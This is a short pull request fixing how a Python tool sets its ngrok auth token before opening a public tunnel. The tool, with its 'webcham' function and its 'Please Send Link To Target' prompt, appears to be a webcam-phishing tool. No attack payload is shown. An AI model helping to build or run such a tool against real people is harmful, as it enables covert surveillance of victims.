### PR TITLE
Ngrok auth token set up

### DIFF
--- a/modules/localhost.py
+++ b/modules/localhost.py
@@ -71,7 +71,8 @@ def webcham():
     # - - - - - - - - - - -- - - - - - - - - - - - - - - -
   banner.banner()
   global token
-  a = ngrok.connect(4545,"http",auth_token=token)
+  ngrok.set_auth_token(token)
+  a = ngrok.connect(4545,"http")
   print(Fore.GREEN+" [+]"+Fore.WHITE+str(a).replace('"','').replace("NgrokTunnel:","").replace("http://","https://"))
   print(Fore.RED+"\n [+] "+Fore.LIGHTCYAN_EX+"Please Send Link To Target")
     # - - - - - - - - - - -- - - - - - - - - - - - - - - -


### PR DESCRIPTION
previous method was giving error for pyngrok. this ngrok.set_auth_token(token) function is injectiong the auth token and giving the exact url